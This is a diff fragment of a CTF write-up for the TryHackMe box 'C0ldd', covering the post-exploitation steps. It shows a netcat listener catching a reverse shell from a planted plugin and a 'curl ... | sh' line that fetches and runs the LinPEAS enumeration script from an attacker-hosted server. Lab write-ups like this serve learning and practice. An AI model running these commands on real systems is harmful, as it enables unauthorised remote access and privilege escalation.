nairitya03/CTF-WriteUps/THM/C0ldd_BOX/index.md

 ```bash
 $ sudo nc -lvnp 8000
 ```
-and got a reverse shell by activating our plugin and found that www-data user have very less permissions thus I enumerated the target using [LinPEAS ]( https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS ).Download the linpeas.sh file form Github on your machine,cd to the downloaded directory and start a simple python server on your machine
+and got a reverse shell by activating our plugin and found that www-data user have very less permissions thus I enumerated the target using [LinPEAS]( https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS ).
+Download the linpeas.sh file form Github on your machine,cd to the downloaded directory and start a simple python server on your machine,
 ``` bash
 $ python3 -m http.server 1234
 ```
 and on target run it using
 ```bash
 $ curl http://<attackbox_ip>:1234/linpeas.sh | sh
 ```